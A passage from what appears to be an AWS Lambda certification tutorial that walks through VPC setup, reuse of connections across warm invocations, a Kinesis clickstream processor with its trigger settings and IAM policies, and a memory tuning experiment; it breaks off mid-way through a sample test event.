&lt;p&gt;&lt;strong&gt;Step 01:&lt;/strong&gt; Open the &lt;code&gt;DataProcessor&lt;/code&gt; function&lt;br&gt;
&lt;strong&gt;Configuration&lt;/strong&gt; tab → &lt;strong&gt;VPC&lt;/strong&gt; → &lt;strong&gt;Edit&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 02:&lt;/strong&gt; &lt;strong&gt;Edit VPC&lt;/strong&gt;&lt;br&gt;
Select the default VPC&lt;br&gt;
Select &lt;strong&gt;at least 2 private subnets&lt;/strong&gt; (for high availability)&lt;br&gt;
Select or create a &lt;strong&gt;security group&lt;/strong&gt; that allows outbound traffic&lt;/p&gt;

&lt;p&gt;Click &lt;strong&gt;Save&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;⚠️Important:&lt;/strong&gt; The Lambda execution role needs the &lt;code&gt;AWSLambdaVPCAccessExecutionRole&lt;/code&gt; managed policy.&lt;/p&gt;
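&lt;p&gt;For reference, &lt;code&gt;AWSLambdaVPCAccessExecutionRole&lt;/code&gt; grants roughly the following; it lets Lambda create and manage the elastic network interfaces it places in your subnets (check the IAM console for the current version of the policy):&lt;/p&gt;

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "logs:CreateLogGroup",
        "logs:CreateLogStream",
        "logs:PutLogEvents",
        "ec2:CreateNetworkInterface",
        "ec2:DescribeNetworkInterfaces",
        "ec2:DeleteNetworkInterface"
      ],
      "Resource": "*"
    }
  ]
}
```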

&lt;p&gt;&lt;strong&gt;Step 03:&lt;/strong&gt; Connection Reuse Pattern&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;When connecting to databases from Lambda, initialize the connection &lt;strong&gt;outside&lt;/strong&gt; the handler:&lt;br&gt;
&lt;/p&gt;


&lt;/blockquote&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;

&lt;span class="c1"&gt;# This runs ONCE during cold start, then reuses across warm invocations
# This is critical for database connections — you don't want to open
# a new connection on every single invocation
&lt;/span&gt;&lt;span class="n"&gt;db_host&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;DB_HOST&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;db_name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;DB_NAME&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c1"&gt;# In a real app, you'd initialize your database connection here
# connection = pymysql.connect(host=db_host, ...)
&lt;/span&gt;
&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;lambda_handler&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
    The handler runs on every invocation.
    The connection above is reused across warm invocations.
    &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
    &lt;span class="c1"&gt;# Use the connection...
&lt;/span&gt;    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;statusCode&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;200&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;body&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;dumps&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;message&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Connected to database&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;})&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;Always initialize SDK clients and database connections &lt;strong&gt;outside&lt;/strong&gt; the handler. That code runs once during the cold start and is reused by every subsequent warm invocation.&lt;br&gt;
For RDS specifically, use &lt;strong&gt;RDS Proxy&lt;/strong&gt; to manage connection pooling: each concurrent execution opens its own connection, so a traffic spike can overwhelm the database.&lt;/p&gt;
&lt;/blockquote&gt;
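&lt;p&gt;The cold-start/warm-invocation split is easy to demonstrate by counting how often each section runs. This is a local simulation of the execution environment, not the Lambda runtime itself:&lt;/p&gt;

```python
# Module scope: runs once per execution environment (the cold start)
init_count = 0

class FakeConnection:
    """Stand-in for a real database connection."""
    def __init__(self):
        global init_count
        init_count += 1

connection = FakeConnection()  # created once, at import time
handler_count = 0

def lambda_handler(event, context):
    # Handler scope: runs on every invocation, reusing `connection`
    global handler_count
    handler_count += 1
    return {"statusCode": 200, "initializations": init_count, "invocations": handler_count}

# Three warm invocations reuse the single connection
for _ in range(3):
    result = lambda_handler({}, None)
print(result)  # {'statusCode': 200, 'initializations': 1, 'invocations': 3}
```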




&lt;h2&gt;
  
  
  Part V
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Process Streaming Data with Kinesis
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Let's build a real-time clickstream processor.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Create a Kinesis Data Stream&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Step 01:&lt;/strong&gt; Open the &lt;strong&gt;Kinesis&lt;/strong&gt; console&lt;br&gt;
Click &lt;strong&gt;Create data stream&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Data stream name:&lt;/strong&gt; &lt;code&gt;clickstream&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Capacity mode:&lt;/strong&gt; &lt;code&gt;On-demand&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Click &lt;strong&gt;Create data stream&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;✅Green banner:&lt;/strong&gt; Data stream clickstream successfully created&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 02:&lt;/strong&gt; Create the Stream Processor Function&lt;br&gt;
Go to &lt;strong&gt;Lambda&lt;/strong&gt; → &lt;strong&gt;Create function&lt;/strong&gt;&lt;br&gt;
Configure:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Function name:&lt;/strong&gt; &lt;code&gt;ClickstreamProcessor&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Runtime:&lt;/strong&gt; Python 3.12&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Memory:&lt;/strong&gt; 512 MB&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Timeout:&lt;/strong&gt; 60 seconds&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Step 03:&lt;/strong&gt; Paste this code&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;base64&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;datetime&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;datetime&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;lambda_handler&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
    Processes clickstream records from Kinesis in near real time.

    Key concepts for the exam:
    - Kinesis data is base64 encoded
    - Records come in batches
    - The partition key determines which shard receives the record
    - Use a high-cardinality partition key (like userId) for even distribution
    &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
    &lt;span class="n"&gt;processed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
    &lt;span class="n"&gt;failed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;

    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Received &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Records&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; records from Kinesis&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;record&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Records&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
        &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="c1"&gt;# Kinesis data is base64 encoded — decode it
&lt;/span&gt;            &lt;span class="n"&gt;raw_data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;base64&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;b64decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;record&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;kinesis&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;][&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;data&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]).&lt;/span&gt;&lt;span class="nf"&gt;decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;utf-8&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;loads&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;raw_data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

            &lt;span class="c1"&gt;# Extract clickstream fields
&lt;/span&gt;            &lt;span class="n"&gt;user_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;userId&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;anonymous&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;page&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;page&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;unknown&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;action&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;action&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;unknown&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;timestamp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;timestamp&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;datetime&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;utcnow&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;isoformat&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;

            &lt;span class="c1"&gt;# Process the click event
&lt;/span&gt;            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Click: user=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;, page=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;page&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;, action=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;action&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;, time=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;timestamp&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

            &lt;span class="c1"&gt;# In a real app, you'd:
&lt;/span&gt;            &lt;span class="c1"&gt;# - Aggregate metrics
&lt;/span&gt;            &lt;span class="c1"&gt;# - Write to DynamoDB or S3
&lt;/span&gt;            &lt;span class="c1"&gt;# - Trigger alerts for specific patterns
&lt;/span&gt;
            &lt;span class="n"&gt;processed&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;

        &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="nb"&gt;Exception&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Failed to process record: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;failed&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;

    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Batch complete: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;processed&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; processed, &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;failed&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; failed&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;statusCode&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;200&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;body&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;dumps&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
            &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;processed&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;processed&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;failed&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;failed&lt;/span&gt;
        &lt;span class="p"&gt;})&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Click &lt;strong&gt;Deploy&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;✅Green banner:&lt;/strong&gt; Successfully updated the function "ClickstreamProcessor".&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 04:&lt;/strong&gt; &lt;strong&gt;Add Permissions&lt;/strong&gt;&lt;br&gt;
The Lambda execution role needs permission to read from Kinesis:&lt;br&gt;
Go to &lt;strong&gt;Configuration&lt;/strong&gt; → &lt;strong&gt;Permissions&lt;/strong&gt; → click the role name&lt;br&gt;
&lt;strong&gt;Add permissions&lt;/strong&gt; → &lt;strong&gt;Attach policies&lt;/strong&gt;&lt;br&gt;
Search for and attach &lt;code&gt;AmazonKinesisReadOnlyAccess&lt;/code&gt;&lt;/p&gt;
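&lt;p&gt;If you prefer least privilege over the broad managed policy, an inline policy scoped to the one stream works too. A sketch (the account ID and stream ARN are placeholders, and the action list approximates what the event source mapping needs):&lt;/p&gt;

```python
import json

# A narrower alternative to AmazonKinesisReadOnlyAccess: an inline policy
# scoped to the single stream. The account ID and ARN are placeholders.
STREAM_ARN = "arn:aws:kinesis:us-east-1:123456789012:stream/clickstream"

policy = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "kinesis:DescribeStream",
                "kinesis:DescribeStreamSummary",
                "kinesis:GetRecords",
                "kinesis:GetShardIterator",
                "kinesis:ListShards",
            ],
            "Resource": STREAM_ARN,
        }
    ],
}

print(json.dumps(policy, indent=2))
```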

&lt;p&gt;&lt;strong&gt;Step 05:&lt;/strong&gt; Connect Kinesis to Lambda&lt;br&gt;
In the &lt;code&gt;ClickstreamProcessor&lt;/code&gt; function, click &lt;strong&gt;Add trigger&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 06:&lt;/strong&gt; Add trigger&lt;br&gt;
&lt;strong&gt;Select a source ▼:&lt;/strong&gt; &lt;code&gt;Kinesis&lt;/code&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Kinesis stream:&lt;/strong&gt; &lt;code&gt;clickstream&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Batch size:&lt;/strong&gt; &lt;code&gt;100&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Starting position:&lt;/strong&gt; Latest&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Batch window:&lt;/strong&gt; &lt;code&gt;5&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;On-failure destination:&lt;/strong&gt; &lt;em&gt;leave empty&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Retry attempts:&lt;/strong&gt; &lt;code&gt;3&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Split batch on error:&lt;/strong&gt; &lt;code&gt;✔ enabled&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Concurrent batches per shard:&lt;/strong&gt; &lt;code&gt;10&lt;/code&gt; &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Click &lt;strong&gt;Add&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;✅Green banner:&lt;/strong&gt; The trigger clickstream was successfully added to function ClickstreamProcessor.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key Kinesis + Lambda settings:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Batch size:&lt;/strong&gt; how many records per invocation (max 10,000)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Batch window:&lt;/strong&gt; how long to wait to fill the batch (max 300s)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Parallelization factor:&lt;/strong&gt; (1–10) process multiple batches per shard concurrently&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Bisect batch on error:&lt;/strong&gt; splits the batch in half on failure to isolate the bad record&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Starting position:&lt;/strong&gt; LATEST (new records only) or TRIM_HORIZON (from the beginning)&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
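&lt;p&gt;The same trigger can also be created programmatically. Here is a sketch of the console settings above expressed as &lt;code&gt;boto3&lt;/code&gt; &lt;code&gt;create_event_source_mapping&lt;/code&gt; arguments (the stream ARN is a placeholder, and the actual call is commented out because it needs live credentials):&lt;/p&gt;

```python
# The trigger configuration from the console, as boto3 kwargs for
# create_event_source_mapping. The stream ARN is a placeholder.
mapping_kwargs = {
    "EventSourceArn": "arn:aws:kinesis:us-east-1:123456789012:stream/clickstream",
    "FunctionName": "ClickstreamProcessor",
    "StartingPosition": "LATEST",
    "BatchSize": 100,
    "MaximumBatchingWindowInSeconds": 5,
    "ParallelizationFactor": 10,
    "BisectBatchOnFunctionError": True,
    "MaximumRetryAttempts": 3,
}

# import boto3
# boto3.client("lambda").create_event_source_mapping(**mapping_kwargs)
print(mapping_kwargs)
```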

&lt;p&gt;&lt;strong&gt;Step 07:&lt;/strong&gt; &lt;strong&gt;Test with Sample Data&lt;/strong&gt;&lt;br&gt;
Send test records to the stream:&lt;br&gt;
Open the &lt;strong&gt;Kinesis&lt;/strong&gt; console → click &lt;code&gt;clickstream&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 08:&lt;/strong&gt; &lt;strong&gt;clickstream&lt;/strong&gt;&lt;br&gt;
Click the &lt;strong&gt;Data viewer&lt;/strong&gt; tab to inspect incoming records, or use the &lt;strong&gt;AWS CLI&lt;/strong&gt; to send test data:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;aws kinesis put-record \
  --stream-name clickstream \
  --partition-key "USER-001" \
  --cli-binary-format raw-in-base64-out \
  --data '{"userId":"USER-001","page":"/products/laptop","action":"view","timestamp":"2026-04-24T10:00:00Z"}'
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;(&lt;code&gt;--cli-binary-format raw-in-base64-out&lt;/code&gt; is needed on AWS CLI v2, which otherwise expects the &lt;code&gt;--data&lt;/code&gt; blob to already be base64-encoded.)&lt;/p&gt;
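&lt;p&gt;If you'd rather script it in Python, here is a rough &lt;code&gt;boto3&lt;/code&gt; equivalent of that CLI command (the call itself is commented out since it needs live credentials):&lt;/p&gt;

```python
import json

# Build the same record the CLI command sends. boto3's put_record takes
# raw bytes for Data; no manual base64 step is needed.
record = {
    "userId": "USER-001",
    "page": "/products/laptop",
    "action": "view",
    "timestamp": "2026-04-24T10:00:00Z",
}

put_kwargs = {
    "StreamName": "clickstream",
    "PartitionKey": record["userId"],
    "Data": json.dumps(record).encode("utf-8"),
}

# import boto3
# boto3.client("kinesis").put_record(**put_kwargs)
print(put_kwargs["StreamName"], put_kwargs["PartitionKey"])
```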

&lt;p&gt;&lt;strong&gt;Step 09:&lt;/strong&gt; Check the &lt;code&gt;ClickstreamProcessor&lt;/code&gt; CloudWatch logs to see the processed records&lt;/p&gt;




&lt;h2&gt;
  
  
  Part VI
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Performance Tuning
&lt;/h3&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Memory vs Duration Experiment&lt;/strong&gt;
&lt;/h4&gt;

&lt;blockquote&gt;
&lt;p&gt;Let's see how memory affects performance:&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Step 01:&lt;/strong&gt; Open the &lt;code&gt;ClickstreamProcessor&lt;/code&gt; function&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 02:&lt;/strong&gt; &lt;strong&gt;Configuration&lt;/strong&gt; → &lt;strong&gt;General configuration&lt;/strong&gt; → &lt;strong&gt;Edit&lt;/strong&gt;&lt;br&gt;
Set &lt;strong&gt;Memory&lt;/strong&gt; to &lt;strong&gt;128 MB&lt;/strong&gt; → &lt;strong&gt;Save&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 03:&lt;/strong&gt; Run a test → note the &lt;strong&gt;Duration&lt;/strong&gt; and &lt;strong&gt;Max Memory Used&lt;/strong&gt; in the execution results&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;{
  "Records": [
    {
      "kinesis": {
